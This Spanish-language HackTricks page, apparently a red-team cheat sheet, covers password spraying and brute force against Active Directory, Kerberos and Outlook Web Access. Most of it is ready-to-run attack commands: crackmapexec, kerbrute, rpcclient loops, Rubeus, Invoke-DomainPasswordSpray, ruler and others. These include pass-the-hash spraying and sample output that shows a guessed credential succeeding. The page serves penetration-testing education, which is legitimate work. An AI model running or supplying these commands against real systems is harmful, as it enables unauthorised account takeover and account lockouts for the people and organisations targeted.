Password Spraying / Brute Force

Aprende a hackear AWS desde cero hasta convertirte en un experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
Obtén la merchandising oficial de PEASS & HackTricks
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Password Spraying

Una vez que hayas encontrado varios nombres de usuario válidos puedes probar con las contraseñas más comunes (ten en cuenta la política de contraseñas del entorno) con cada uno de los usuarios descubiertos. Por defecto, la longitud mínima de la contraseña es 7.

Las listas de nombres de usuario comunes también podrían ser útiles: https://github.com/insidetrust/statistically-likely-usernames

Ten en cuenta que podrías bloquear algunas cuentas si pruebas varias contraseñas incorrectas (por defecto más de 10).

Obtener la política de contraseñas

Si tienes algunas credenciales de usuario o una shell como usuario de dominio puedes obtener la política de contraseñas con:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Explotación desde Linux (o cualquier sistema)

Utilizando crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

Utilizando kerbrute (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

spray (puedes indicar el número de intentos para evitar bloqueos):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

Usando kerbrute (python) - NO RECOMENDADO A VECES NO FUNCIONA

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

Con el módulo scanner/smb/smb_login de Metasploit:

Utilizando rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Desde Windows

Con la versión de Rubeus con el módulo de fuerza bruta:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

Con Invoke-DomainPasswordSpray (Puede generar usuarios del dominio de forma predeterminada y obtendrá la política de contraseñas del dominio y limitará los intentos según esta):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

Con Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Fuerza Bruta

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Acceso web de Outlook

Existen múltiples herramientas para realizar password spraying en Outlook.

Con MSF Owa_login
con MSF Owa_ews_login
Con Ruler (¡confiable!)
Con DomainPasswordSpray (Powershell)
Con MailSniper (Powershell)

Para utilizar cualquiera de estas herramientas, necesitas una lista de usuarios y una contraseña / una pequeña lista de contraseñas para realizar el spraying.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

Referencias

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
Obtén el oficial PEASS & HackTricks swag
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud github.

AnteriorPass the Ticket SiguientePrintNightmare

Última actualización hace 3 días